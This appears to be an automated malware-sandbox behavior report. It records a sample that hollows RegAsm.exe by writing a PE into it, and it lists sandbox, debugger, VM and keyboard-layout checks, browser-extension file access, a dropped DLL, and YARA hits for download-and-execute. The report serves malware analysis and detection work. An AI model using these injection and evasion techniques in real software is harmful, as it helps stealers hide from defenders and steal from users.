Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004189AF GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_004189AF

Source: sqlt[1].dll.3.dr

Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDC422 push ecx; ret	0_2_00FDC435
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A535 push ecx; ret	3_2_0041A548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D1BF9 push ecx; ret	3_2_1B574C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D10C8 push ecx; ret	3_2_1B5D3552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004189AF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 3872, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\file.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041098E GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410AA1h

3_2_0041098E

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF3EC7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00FF3EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D1BA _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D1BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A025 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A025
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417148 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00417148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401162
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A440 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B4C3 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040B4C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417591 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00417591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004166D7 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	3_2_004166D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040AAB4 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040AAB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416DA3 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00416DA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BFA5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040BFA5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00416B24 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

3_2_00416B24

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410B2A GetSystemInfo,wsprintfA,

3_2_00410B2A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000003.00000002.2942656368.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: RegAsm.exe, 00000003.00000002.2942656368.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 00000003.00000002.2943348984.0000000003595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_3-82154

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00FE0863 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00FE0863

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004189AF

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF2127 mov eax, dword ptr fs:[00000030h]		0_2_00FF2127
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEAB42 mov ecx, dword ptr fs:[00000030h]		0_2_00FEAB42

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00FF7113 GetProcessHeap,

0_2_00FF7113

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE0863 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FE0863
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDCA4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FDCA4D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDCBDA SetUnhandledExceptionFilter,	0_2_00FDCBDA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDC746 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FDC746
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A6DF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041A6DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F798 SetUnhandledExceptionFilter,	3_2_0041F798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041BC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041BC07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D42AF SetUnhandledExceptionFilter,	3_2_1B3D42AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3D2C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_1B3D2C8E

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3872, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0151018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_0151018D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411E67 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

3_2_00411E67

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42F000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B18008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00FDC51C cpuid

0_2_00FDC51C

Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00FF68D5
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00FF683A
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00FF6960
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00FEE26B
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00FF6BB3
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00FF6CDC
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00FF6DE2
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00FEDDA0
Source: C:\Users\user\Desktop\file.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00FF654D
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00FF6EB1
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00FF67EF
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00FF6748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_0041098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	3_2_1B3D2112
